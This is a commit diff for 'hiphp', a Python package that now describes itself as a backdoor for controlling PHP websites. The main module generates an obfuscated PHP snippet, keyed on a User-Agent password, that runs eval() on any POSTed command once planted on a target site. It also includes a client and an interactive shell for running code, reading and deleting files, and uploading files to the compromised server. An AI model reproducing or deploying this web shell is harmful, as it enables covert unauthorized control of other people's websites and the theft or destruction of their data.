Projects STRLCPY hiphp Commits c2a4d6fe
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■
    skipped 1 lines
    2 2  <p align="center"><img align="center" src=""></p>
    3 3  <h1>hiphp for control php websites.</h1>
    4 4  
    5  -<p>A package for controlling a php-based website.</p>
     5 +<p>backdoor control php sites, The site is controlled by sending commands, files and codes to the site using the http or https protocol. After copying the code and placing it in any php file on the target website, you will have permissions to enter it, read all files, delete and even upload new files to it. Also, this backdoor is password protected and non-reverse encryption.</p>
    6 6  
    7 7  <h2>Installation:</h2>
    8 8  
    9 9  ```
    10  -pip install hiphp==0.1.11
     10 +pip install hiphp==0.1.13
    11 11  ```
    12 12  
    13 13  <h2>Usage:</h2>
    14 14  
    15 15  ```python
     16 +#call the package:
    16 17  from hiphp import hiphp
    17  -p1=hiphp("<PASSWORD>","<http://THE/LINK/TO/THE/PHP/FILE/THAT/CONTAINS/THE/HIPHP/ID>",False) #In order to print the result directly.
    18  -#p1=hiphp("<PASSWORD>","<http://THE/LINK/TO/THE/PHP/FILE/THAT/CONTAINS/THE/HIPHP/ID>") #In order to make the result as a variable.
    19  -print(p1.get_code()) #Get HIPHP ID for first use.
    20"<YOUR_CODE>") #Run a code or line in your website.
    21  -p1.run_file("<PHP_CODE_FILE_PATH>") #Run a code or line in your website from a file.
    22  -p1.run_file("<PHP_CODE_FILE_PATH>","<__VALUE_NAME__>==<VALUE_CONTENT>") #Run a code or line in your website from a file With the entry of variables.
    23  -p1.cli() #open command panel
    24  -p1.upload("<THE_PATH_OF_THE_FILE_TO_BE_UPLOADED>") #Upload a file to the server hosting the site.
     18 +#
     19 +#
     20 +#In order to print the result directly.
     21 +p1=hiphp("<PASSWORD>","<http://THE/LINK/TO/THE/PHP/FILE/THAT/CONTAINS/THE/HIPHP/ID>",False)
     22 +#
     23 +#In order to make the result as a variable.
     25 +#
     26 +#
     27 +#Get HIPHP ID for first use.
     28 +print(p1.get_code())
     29 +#
     30 +#
     31 +#Run a code or line in your website.
     33 +#
     34 +#Run a code or line in your website from a file.
     35 +p1.run_file("<PHP_CODE_FILE_PATH>")
     36 +#
     37 +#Run a code or line in your website from a file With the entry of variables.
     38 +p1.run_file("<PHP_CODE_FILE_PATH>","<__VALUE_NAME__>==<VALUE_CONTENT>")
     39 +#
     40 +#
     41 +#open command line interface.
     42 +p1.cli()
     43 +#
     44 +#
     45 +#Upload a file to the server hosting the site.
     46 +p1.upload("<THE_PATH_OF_THE_FILE_TO_BE_UPLOADED>")
     47 +#
     48 +#Upload a file to a specific folder in the server hosting the site.
    26 50  
    27 51  ```
    skipped 2 lines
    30 54  
    31 55  ```python
    32 56  from hiphp import hiphp
     57 +#
     58 +#
    33 59  p1=hiphp("123","http://localhost/index.php",False)
     60 +#
     61 +#
     62 +#
    34 63  # Example:1
    35 64  # GET ID:
    36 65  print(p1.get_code())
    skipped 5 lines
    42 71  '''
    43 72  # Copy this code into the file whose path you entered earlier.
    44 73  # for example: https://localhost/index.php
     74 +#
     75 +#
     76 +#
    45 77  # Example:2
    46 78  # Command:
    47 79"echo 'this is a test';")
    skipped 1 lines
    49 81  '''
    50 82  this is a test
    51 83  '''
     84 +#
     85 +#
     86 +#
    52 87  # Example:3
    53 88  # Run code from file:
    54 89  #-example_3.php content:
    skipped 11 lines
    66 101  '''
    67 102  this is a test
    68 103  '''
     104 +#
     105 +#
     106 +#
    69 107  # Example:4
    70 108  # Run code from file With the entry of variables:
    71 109  #-example_4.php content:
    skipped 11 lines
    83 121  '''
    84 122  this is a test
    85 123  '''
     124 +#
     125 +#
     126 +#
    86 127  # Example:5
    87 128  # Command line interface:
    88 129  p1.cli()
    skipped 1 lines
    90 131  '''
    91 132  hiphp>>>
    92 133  '''
     134 +#
     135 +#
     136 +#
    93 137  # Example:6
    94 138  # Upload a picture:
    95 139  p1.upload("picture_example.png")
     140 +#
     141 +#
     142 +#
    96 143  # Example:7
    97 144  # Upload a picture to a specific path:
    98 145  p1.upload("picture_example.png","./pictures/")
    skipped 3 lines
    102 149  <h2>Changelog:</h2>
    103 150  
    104 151  ```
     152 +#
     153 +## 0.1.13
     154 + - safety upgrade.
     155 + - Bug fixes & performance improvements.
     156 +#
     157 +## 0.1.12
     158 + - safety upgrade.
     159 + - Bug fixes & performance improvements.
     160 +#
    105 161  ## 0.1.11
    106 162   - Command interface update.
    107 163   - Bug fixes & performance improvements.
     164 +#
    108 165  ## 0.1.10
    109 166   - Fix Bugs.
     167 +#
    110 168  ## 0.1.9
    111 169   - fix bugs.
    112  -
     170 +#
    113 171  ## 0.1.7
    114 172   - fix bugs.
    115  -
     173 +#
    116 174  ## 0.1.6
    117 175   - fix bugs.
    118 176   - add upload to upload any file.
    119 177   - Simplify the use of the program.
    120  -
     178 +#
    121 179  ## 0.1.5
    122 180   - fix bugs.
     181 +#
    123 182  ## 0.1.4
    124 183   - fix bugs.
    125 184   - new build.
    126  -
     185 +#
    127 186  ## 0.1.1
    128 187   - Import pakages by pipincluder.
    129 188   - Fix bugs.
    130  -
     189 +#
    131 190  ## 0.1.0
    132 191   - New build.
    133 192   - Fix bugs.
    134  -
     193 +#
    135 194  ## 0.0.4
    136 195   - Fix bugs.
    137  -
     196 +#
    138 197  ## 0.0.2
    139 198   - Fix bugs.
    140 199   - Add help list.
    141 200   - Add Executing from files.
    142  -
     201 +#
    143 202  ## 0.0.1
    144 203   - First public release.
    145 204  
    skipped 36 lines
  • ■ ■ ■ ■ ■ ■
     1 +#
     2 +## 0.1.13
     3 + - safety upgrade.
     4 + - Bug fixes & performance improvements.
     5 +#
     6 +## 0.1.12
     7 + - safety upgrade.
     8 + - Bug fixes & performance improvements.
     9 +#
    1 10  ## 0.1.11
    2 11   - Command interface update.
    3 12   - Bug fixes & performance improvements.
     13 +#
    4 14  ## 0.1.10
    5 15   - Fix Bugs.
     16 +#
    6 17  ## 0.1.9
    7 18   - fix bugs.
    8  -
     19 +#
    9 20  ## 0.1.7
    10 21   - fix bugs.
    11  -
     22 +#
    12 23  ## 0.1.6
    13 24   - fix bugs.
    14 25   - add upload to upload any file.
    15 26   - Simplify the use of the program.
    16  -
     27 +#
    17 28  ## 0.1.5
    18 29   - fix bugs.
     30 +#
    19 31  ## 0.1.4
    20 32   - fix bugs.
    21 33   - new build.
    22  -
     34 +#
    23 35  ## 0.1.1
    24 36   - Import pakages by pipincluder.
    25 37   - Fix bugs.
    26  -
     38 +#
    27 39  ## 0.1.0
    28 40   - New build.
    29 41   - Fix bugs.
    30  -
     42 +#
    31 43  ## 0.0.4
    32 44   - Fix bugs.
    33  -
     45 +#
    34 46  ## 0.0.2
    35 47   - Fix bugs.
    36 48   - Add help list.
    37 49   - Add Executing from files.
    38  -
     50 +#
    39 51  ## 0.0.1
    40 52   - First public release.
    41 53   
  • ■ ■ ■ ■ ■ ■
    1 1  from hiphp import hiphp
     2 +#
     3 +#
    2 4  p1=hiphp("123","http://localhost/index.php",False)
     5 +#
     6 +#
     7 +#
    3 8  # Example:1
    4 9  # GET ID:
    5 10  print(p1.get_code())
    skipped 5 lines
    11 16  '''
    12 17  # Copy this code into the file whose path you entered earlier.
    13 18  # for example: https://localhost/index.php
     19 +#
     20 +#
     21 +#
    14 22  # Example:2
    15 23  # Command:
    16 24"echo 'this is a test';")
    skipped 1 lines
    18 26  '''
    19 27  this is a test
    20 28  '''
     29 +#
     30 +#
     31 +#
    21 32  # Example:3
    22 33  # Run code from file:
    23 34  #-example_3.php content:
    skipped 11 lines
    35 46  '''
    36 47  this is a test
    37 48  '''
     49 +#
     50 +#
     51 +#
    38 52  # Example:4
    39 53  # Run code from file With the entry of variables:
    40 54  #-example_4.php content:
    skipped 11 lines
    52 66  '''
    53 67  this is a test
    54 68  '''
     69 +#
     70 +#
     71 +#
    55 72  # Example:5
    56 73  # Command line interface:
    57 74  p1.cli()
    skipped 1 lines
    59 76  '''
    60 77  hiphp>>>
    61 78  '''
     79 +#
     80 +#
     81 +#
    62 82  # Example:6
    63 83  # Upload a picture:
    64 84  p1.upload("picture_example.png")
     85 +#
     86 +#
     87 +#
    65 88  # Example:7
    66 89  # Upload a picture to a specific path:
    67 90  p1.upload("picture_example.png","./pictures/")
    skipped 1 lines
  • ■ ■ ■ ■ ■ ■
    skipped 4 lines
    5 5  ##################################################################
    6 6  # USAGE :
    7 7  #s
     8 +#call the package:
    8 9  from hiphp import hiphp
    9  -p1=hiphp("<PASSWORD>","<http://THE/LINK/TO/THE/PHP/FILE/THAT/CONTAINS/THE/HIPHP/ID>",False) #In order to print the result directly.
    10  -#p1=hiphp("<PASSWORD>","<http://THE/LINK/TO/THE/PHP/FILE/THAT/CONTAINS/THE/HIPHP/ID>") #In order to make the result as a variable.
    11  -print(p1.get_code()) #Get HIPHP ID for first use.
    12"<YOUR_CODE>") #Run a code or line in your website.
    13  -p1.run_file("<PHP_CODE_FILE_PATH>") #Run a code or line in your website from a file.
    14  -p1.run_file("<PHP_CODE_FILE_PATH>","<__VALUE_NAME__>==<VALUE_CONTENT>") #Run a code or line in your website from a file With the entry of variables.
    15  -p1.cli() #open command panel
    16  -p1.upload("<THE_PATH_OF_THE_FILE_TO_BE_UPLOADED>") #Upload a file to the server hosting the site.
     10 +#
     11 +#
     12 +#In order to print the result directly.
     13 +p1=hiphp("<PASSWORD>","<http://THE/LINK/TO/THE/PHP/FILE/THAT/CONTAINS/THE/HIPHP/ID>",False)
     14 +#
     15 +#In order to make the result as a variable.
     17 +#
     18 +#
     19 +#Get HIPHP ID for first use.
     20 +print(p1.get_code())
     21 +#
     22 +#
     23 +#Run a code or line in your website.
     25 +#
     26 +#Run a code or line in your website from a file.
     27 +p1.run_file("<PHP_CODE_FILE_PATH>")
     28 +#
     29 +#Run a code or line in your website from a file With the entry of variables.
     30 +p1.run_file("<PHP_CODE_FILE_PATH>","<__VALUE_NAME__>==<VALUE_CONTENT>")
     31 +#
     32 +#
     33 +#open command line interface.
     34 +p1.cli()
     35 +#
     36 +#
     37 +#Upload a file to the server hosting the site.
     38 +p1.upload("<THE_PATH_OF_THE_FILE_TO_BE_UPLOADED>")
     39 +#
     40 +#Upload a file to a specific folder in the server hosting the site.
    18 42  #e
    19 43  ##################################################################
    20 44  # EXAMPLES :
    21 45  #s
    22 46  from hiphp import hiphp
     47 +#
     48 +#
    23 49  p1=hiphp("123","http://localhost/index.php",False)
    24  -
     50 +#
     51 +#
     52 +#
    25 53  # Example:1
    26 54  # GET ID:
    27 55  print(p1.get_code())
    skipped 5 lines
    33 61  '''
    34 62  # Copy this code into the file whose path you entered earlier.
    35 63  # for example: https://localhost/index.php
    36  -
     64 +#
     65 +#
     66 +#
    37 67  # Example:2
    38 68  # Command:
    39 69"echo 'this is a test';")
    skipped 1 lines
    41 71  '''
    42 72  this is a test
    43 73  '''
    44  -
     74 +#
     75 +#
     76 +#
    45 77  # Example:3
    46 78  # Run code from file:
    47 79  #-example_3.php content:
    skipped 11 lines
    59 91  '''
    60 92  this is a test
    61 93  '''
    62  -
     94 +#
     95 +#
     96 +#
    63 97  # Example:4
    64 98  # Run code from file With the entry of variables:
    65 99  #-example_4.php content:
    skipped 11 lines
    77 111  '''
    78 112  this is a test
    79 113  '''
    80  -
     114 +#
     115 +#
     116 +#
    81 117  # Example:5
    82 118  # Command line interface:
    83 119  p1.cli()
    skipped 1 lines
    85 121  '''
    86 122  hiphp>>>
    87 123  '''
    88  -
     124 +#
     125 +#
     126 +#
    89 127  # Example:6
    90 128  # Upload a picture:
    91 129  p1.upload("picture_example.png")
    92  -
     130 +#
     131 +#
     132 +#
    93 133  # Example:7
    94 134  # Upload a picture to a specific path:
    95 135  p1.upload("picture_example.png","./pictures/")
    skipped 1 lines
    97 137  ##################################################################
    98 138  # CHANGELOG :
    99 139  #s
     140 +#
     141 +## 0.1.13
     142 + - safety upgrade.
     143 + - Bug fixes & performance improvements.
     144 +#
     145 +## 0.1.12
     146 + - safety upgrade.
     147 + - Bug fixes & performance improvements.
     148 +#
    100 149  ## 0.1.11
    101 150   - Command interface update.
    102 151   - Bug fixes & performance improvements.
    103  -
     152 +#
    104 153  ## 0.1.10
    105 154   - Fix Bugs.
    106  -
     155 +#
    107 156  ## 0.1.9
    108 157   - fix bugs.
    109  -
     158 +#
    110 159  ## 0.1.7
    111 160   - fix bugs.
    112  -
     161 +#
    113 162  ## 0.1.6
    114 163   - fix bugs.
    115 164   - add upload to upload any file.
    116 165   - Simplify the use of the program.
    117  -
     166 +#
    118 167  ## 0.1.5
    119 168   - fix bugs.
     169 +#
    120 170  ## 0.1.4
    121 171   - fix bugs.
    122 172   - new build.
    123  -
     173 +#
    124 174  ## 0.1.1
    125 175   - Import pakages by pipincluder.
    126 176   - Fix bugs.
    127  -
     177 +#
    128 178  ## 0.1.0
    129 179   - New build.
    130 180   - Fix bugs.
    131  -
     181 +#
    132 182  ## 0.0.4
    133 183   - Fix bugs.
    134  -
     184 +#
    135 185  ## 0.0.2
    136 186   - Fix bugs.
    137 187   - Add help list.
    138 188   - Add Executing from files.
    139  -
     189 +#
    140 190  ## 0.0.1
    141 191   - First public release.
    142 192  #e
    143 193  ##################################################################
    144 194  """
    145 195  # VALUES :
    146  -__version__="0.1.11"
     196 +__version__="0.1.13"
    147 197  __name__="hiphp"
    148 198  __author__="Yasser Bdj (Boudjada Yasser)"
    149 199  __author_email__="[email protected]"
    150 200  __github_user_name__="yasserbdj96"
    151 201  __title__="hiphp for control php websites."
    152  -__description__="A package for controlling a php-based website."
     202 +__description__="backdoor control php sites, The site is controlled by sending commands, files and codes to the site using the http or https protocol. After copying the code and placing it in any php file on the target website, you will have permissions to enter it, read all files, delete and even upload new files to it. Also, this backdoor is password protected and non-reverse encryption."
    153 203  __author_website__=f"https://{__github_user_name__}"
    154 204  __source_code__=f"{__github_user_name__}/{__name__}"
    155 205  __keywords__=[__github_user_name__,'python']
    156 206  __keywords__.extend(__title__.split(" "))
    157 207  __keywords__.extend(__description__.split(" "))
    158  -__install_requires__=["pipincluder",'requests','ashar','hexor']
     208 +__install_requires__=["pipincluder"]
    159 209  __Installation__="pip install "+__name__+"=="+__version__
    160 210  __license__='MIT License'
    161 211  __copyright__='Copyright © 2008->Present, '+__author__+"."
    skipped 24 lines
    186 236   "from ashar import ashar",
    187 237   "from hexor import hexor",
    188 238   "import re,base64,os",
    189  - "import yasserbdj96").modules())
     239 + "import yasserbdj96",
     240 + "import time").modules())
    190 241  
    191 242  #start hiphp class:
    192 243  class hiphp:
    193 244   #__init__:
    194 245   def __init__(self,key,url,returns=True):
     246 + self.start=time.time()
     247 +
    195 248   self.pp=key
    196 249   self.key=ashar(key,key).encode()
    197 250   self.url=url
    skipped 2 lines
    200 253   self.print2=hexor(True)
    201 254   self.returns=returns
    202 255  
     256 + self.cc1="#ea4335"#red
     257 + self.cc2="#f3938b"#white-red
     258 + self.cc3="#4285f4"#bleu
     259 + self.cc4="#fbbc05"#yallew
     260 + self.cc5="#34a853"#green
     261 +
    203 262   #run:
    204 263   def run(self,command):
    205 264   if self.returns==True:
    206  - return,self.headers,command,self.returns)
     265 + return,self.headers,command,self.returns,self.key)
    207 266   else:
    208  -,self.headers,command,self.returns)
     267 +,self.headers,command,self.returns,self.key)
    209 268  
    210 269   #logo:
    211 270   def logo(self):
    212 271   p1=hexor(True,"hex")
    213 272   p2=hexor(False,"hex")
    214 273  
    215  - logo="""
    216  - ██╗ ██╗██╗██████╗ ██╗ ██╗██████╗
    217  - ██ ████████ ██████
    218  - ████████████████████████
    219  - ██╔══██║██║██╔═══╝ ██╔══██║██╔═══╝
    220  - ██║ ██║██║██║ ██║ ██║██║
    221  - ╚═╝ ╚═╝╚═╝╚═╝ ╚═╝ ╚═╝╚═╝"""
     274 + spas=" "*1
     275 + logo=f"""
     276 +{spas} ███████ ██████
     277 +{spas} ███ ███ ███ ███ ███ ███ ███ ███
     278 +{spas} ███ ███ ███▌ ███ ███ ███ ███ ███ ███
     279 +{spas} ▄███▄▄▄▄███▄▄ ███▌ ███ ███ ▄███▄▄▄▄███▄▄ ███ ███
     280 +{spas}▀▀███▀▀▀▀███▀ ███▌ ▀█████████▀ ▀▀███▀▀▀▀███▀ ▀█████████▀
     281 +{spas} ███ ███ ███ ███ ███ ███ ███
     282 +{spas} ███ ███ ███ ███ ███ ███ ███
     283 +{spas} ███ █▀ █▀ ▄████▀ ███ █▀ ▄████▀
     284 +"""
    222 285  
    223 286   s=[]
    224  - arr=["╦:::#7e4367","╚:::#7e4367","╝:::#7e4367","╩:::#7e4367","╔:::#7e4367","╗:::#7e4367","╠:::#7e4367","═:::#7e4367","║:::#7e4367",
    225  - "╣:::#7e4367","█:::#db61a2"]
     287 + arr=[f"█:::{self.cc1}",f"▄:::{self.cc1}",f"▀:::{self.cc1}",f"▐:::{self.cc1}",f"▌:::{self.cc1}"]
    226 288   for i in range(len(arr)):
    227 289   s.append(p1.c(arr[i].split(":::")[0],arr[i].split(":::")[1]))
    228 290   logo=logo.replace(arr[i].split(":::")[0],s[i])
    229 291  
    230 292   print(logo)
    231 293   print(yasserbdj96.about(__version__))
    232  - print("\n")
     294 + #print("\n")
    233 295  
    234  - s1=p1.c("[","#db61a2")
    235  - s2=p1.c("*","#7e4367")
    236  - s3=p1.c("*","#db61a2")
    237  - s4=p1.c("]","#db61a2")
    238  - print(s1+s2+s3+s2+s4+p1.c(f" Contacting to '{self.url}' ........","#f7df1e")+p1.c("[done!]","#94c856"))
     296 + s1=p1.c("[",f"{self.cc1}")
     297 + s2=p1.c("*",f"{self.cc2}")
     298 + s3=p1.c("*",f"{self.cc1}")
     299 + s4=p1.c("]",f"{self.cc1}")
    239 300  
    240  - print("\n")
    241  - p2.c(" - You are now connected safety. You can print the PHP commands below for comprehensive control of the site.","#db61a2")
    242  - p2.c(" - If you are having difficulties controlling the program, you can type '--help'","#f34f29")
    243  - p2.c(" - Ctrl+C for exit :)","#f34f29")
     301 + end=time.time()
     302 + seconds=str(end-self.start)
     303 + seconds=p1.c(" in "+seconds[0:4]+"s",f"{self.cc2}")
    244 304  
    245  - print("\n")
     305 + #print(s1+s2+s3+s2+s4+p1.c(f" Contacting to '{self.url}' ........",f"{self.cc4}")+p1.c("[done!]",f"{self.cc5}")+seconds)
     306 +
     307 + p2.c("\n - You are now connected safety. You can print the PHP commands below for comprehensive control of the site.",f"{self.cc3}")
     308 + p2.c(" - If you are having difficulties controlling the program, you can type '--help' for more informations.",f"{self.cc4}")
     309 + p2.c(" - Ctrl+C for exit :)\n",f"{self.cc4}")
    246 310  
    247 311   #cli:
    248 312   def cli(self,see=True):
     313 +
    249 314   p1=hexor(True,"hex")
    250 315   if see==True:
    251 316   hiphp.logo(self)
    252 317   if == 'nt':
    253  - ch="@"
     318 + ch=p1.c("@",f'{self.cc1}')
     319 + "@"
    254 320   else:
    255 321   ch="💀"
    256 322  
    257  - p=hiphp(self.pp,self.url,True).run("echo getcwd();")
    258  - print("┌──("+p1.c(f'hiphp{ch}{self.url}',"#db61a2")+f")──[{p1.c(p,'#db61a2')}]")
    259  - command=input("└─>")
     323 +
     324 +
     325 + p=p1.c(hiphp(self.pp,self.url,True).run("echo getcwd();"),f'{self.cc1}')
     326 +
     327 + id_url=p1.c(f'{self.key[0:10]}',f'{self.cc4}')+ch+p1.c(f'{self.url}',f'{self.cc5}')
     328 +
     329 + xxr1=p1.c('┌──(',f'{self.cc3}')
     330 + xxr2=p1.c(')──[',f'{self.cc3}')
     331 + xxr3=p1.c(']',f'{self.cc3}')
     332 + xxr4=p1.c('└─>',f'{self.cc3}')
     333 +
     334 + print(xxr1+id_url+xxr2+p+xxr3)
     335 + command=input(xxr4)
    260 336   if command:
    261 337   if command=="--help":
    262 338   print("-rf <PHP_CODE_FILE_PATH> | # Run a code or line in your website from a file.")
    263 339   print("-up <THE_PATH_OF_THE_FILE_TO_BE_UPLOADED> | # Upload a file to the server hosting the site.")
    264  - print("-up <FILE_PATH> ./<THE_PATH_YOU_WANT_TO_UPLOAD_THE_FILE_TO>")
     340 + print("-up <FILE_PATH> ./<THE_PATH_YOU_WANT_TO_UPLOAD_THE_FILE_TO>/")
    265 341   elif command[0:3]=="-rf":
    266 342   hiphp.run_file(self,command[4:len(command)])
    267 343   elif command[0:3]=="-up":
    268 344   try:
    269 345   file,to=command[4:len(command)].split(" ")
     346 + if to[len(to)-1:len(to)]!="/":
     347 + to=to+"/"
    270 348   hiphp.upload(self,file,to)
    271 349   except:
    272 350   hiphp.upload(self,command[4:len(command)])
    273 351   elif command[0:3]=="-gc":
    274 352   print(hiphp.get_code(self))
    275 353   else:
    276  -,self.headers,command,self.returns)
     354 +,self.headers,command,self.returns,self.key)
    277 355   else:
    278 356   print(p1.c("Command not found!","#ff5b3c"))
    279 357   hiphp.cli(self,False)
    skipped 11 lines
    291 369   open_file=open_file.replace(f"__{value}__",string)
    292 370  
    293 371   if self.returns==True:
    294  - return,self.headers,open_file,self.returns)
     372 + return,self.headers,open_file,self.returns,self.key)
    295 373   else:
    296  -,self.headers,open_file,self.returns)
     374 +,self.headers,open_file,self.returns,self.key)
    297 375   except:
    298 376   self.print.c("The file you entered does not exist.","#ff5b3c")
    299 377  
    skipped 9 lines
    309 387   self.print.c(f"We could not read the file {path_to_upluad}","#ff5b3c")
    310 388  
    311 389   #do:
    312  - def do(url,headers,command,returns):
     390 + def do(url,headers,command,returns,key):
    313 391,headers=headers)
    314 392   if response.status_code==200:
    315  - if response.text[0:7]=="#python":
     393 + key_len=len(key)+1
     394 + if response.text[0:key_len]=="#"+key:
    316 395   ploads={'command':command}#open('php.php').read()
    317 396,headers=headers,data=ploads)
    318 397   if returns==True:
    319  - return hiphp.check_errors(response.text[7:],returns)
     398 + return hiphp.check_errors(response.text[key_len:],returns)
    320 399   else:
    321  - hiphp.check_errors(response.text[7:],returns)
     400 + hiphp.check_errors(response.text[key_len:],returns)
    322 401   else:
    323 402   hexor().c("We were unable to recognize the hiphp identifier.","#ff5b3c")
     403 + exit()
    324 404   else:
    325 405   hexor().c("We were unable to connect '"+url+"'.","#ff5b3c")
     406 + exit()
    326 407  
    327 408   #check_errors:
    328 409   def check_errors(response,returns):
    skipped 14 lines
    343 424  
    344 425   #Get_code:
    345 426   def get_code(self):
    346  - code="if($_SERVER['HTTP_USER_AGENT']=='"+self.key+"'){echo'#python';if(isset($_POST['command'])){eval($_POST['command']);}exit;}"
     427 + code="if($_SERVER['HTTP_USER_AGENT']=='"+self.key+"'){echo'#"+self.key+"';if(isset($_POST['command'])){eval($_POST['command']);}exit;}"
    347 428   code=hiphp.rot13(code)
    348 429   code=ashar.tob64(code)
    349 430   code=hiphp.rot13(code)
    skipped 6 lines
  • ■ ■ ■ ■ ■ ■
    1 1  from setuptools import setup,find_packages
    2 2  setup(
    3 3   name="hiphp",
    4  - version="0.1.11",
     4 + version="0.1.13",
    5 5   author="Yasser Bdj (Boudjada Yasser)",
    6 6   author_email="[email protected]",
    7  - description='''A package for controlling a php-based website.''',
     7 + description='''backdoor control php sites, The site is controlled by sending commands, files and codes to the site using the http or https protocol. After copying the code and placing it in any php file on the target website, you will have permissions to enter it, read all files, delete and even upload new files to it. Also, this backdoor is password protected and non-reverse encryption.''',
    8 8   long_description_content_type="text/markdown",
    9 9   long_description=open('','r').read(),
    10 10   license='''MIT License''',
    skipped 2 lines
    13 13   project_urls={
    14 14   'Author WebSite': "",
    15 15   },
    16  - install_requires=['pipincluder', 'requests', 'ashar', 'hexor'],
    17  - keywords=['yasserbdj96', 'python', 'hiphp', 'for', 'control', 'php', 'websites.', 'A', 'package', 'for', 'controlling', 'a', 'php-based', 'website.'],
     16 + install_requires=['pipincluder'],
     17 + keywords=['yasserbdj96', 'python', 'hiphp', 'for', 'control', 'php', 'websites.', 'backdoor', 'control', 'php', 'sites,', 'The', 'site', 'is', 'controlled', 'by', 'sending', 'commands,', 'files', 'and', 'codes', 'to', 'the', 'site', 'using', 'the', 'http', 'or', 'https', 'protocol.', 'After', 'copying', 'the', 'code', 'and', 'placing', 'it', 'in', 'any', 'php', 'file', 'on', 'the', 'target', 'website,', 'you', 'will', 'have', 'permissions', 'to', 'enter', 'it,', 'read', 'all', 'files,', 'delete', 'and', 'even', 'upload', 'new', 'files', 'to', 'it.', 'Also,', 'this', 'backdoor', 'is', 'password', 'protected', 'and', 'non-reverse', 'encryption.'],
    18 18   classifiers=[
    19 19   "Development Status :: 5 - Production/Stable",
    20 20   "Intended Audience :: Developers",
    skipped 11 lines
  • ■ ■ ■ ■ ■
     1 +#call the package:
    1 2  from hiphp import hiphp
    2  -p1=hiphp("<PASSWORD>","<http://THE/LINK/TO/THE/PHP/FILE/THAT/CONTAINS/THE/HIPHP/ID>",False) #In order to print the result directly.
    3  -#p1=hiphp("<PASSWORD>","<http://THE/LINK/TO/THE/PHP/FILE/THAT/CONTAINS/THE/HIPHP/ID>") #In order to make the result as a variable.
    4  -print(p1.get_code()) #Get HIPHP ID for first use.
    5"<YOUR_CODE>") #Run a code or line in your website.
    6  -p1.run_file("<PHP_CODE_FILE_PATH>") #Run a code or line in your website from a file.
    7  -p1.run_file("<PHP_CODE_FILE_PATH>","<__VALUE_NAME__>==<VALUE_CONTENT>") #Run a code or line in your website from a file With the entry of variables.
    8  -p1.cli() #open command panel
    9  -p1.upload("<THE_PATH_OF_THE_FILE_TO_BE_UPLOADED>") #Upload a file to the server hosting the site.
     3 +#
     4 +#
     5 +#In order to print the result directly.
     7 +#
     8 +#In order to make the result as a variable.
     10 +#
     11 +#
     12 +#Get HIPHP ID for first use.
     13 +print(p1.get_code())
     14 +#
     15 +#
     16 +#Run a code or line in your website.
     18 +#
     19 +#Run a code or line in your website from a file.
     20 +p1.run_file("<PHP_CODE_FILE_PATH>")
     21 +#
     22 +#Run a code or line in your website from a file With the entry of variables.
     23 +p1.run_file("<PHP_CODE_FILE_PATH>","<__VALUE_NAME__>==<VALUE_CONTENT>")
     24 +#
     25 +#
     26 +#open command line interface.
     27 +p1.cli()
     28 +#
     29 +#
     30 +#Upload a file to the server hosting the site.
     31 +p1.upload("<THE_PATH_OF_THE_FILE_TO_BE_UPLOADED>")
     32 +#
     33 +#Upload a file to a specific folder in the server hosting the site.
    11 35   
  • ■ ■ ■ ■
    1  -0.1.11
     1 +0.1.13
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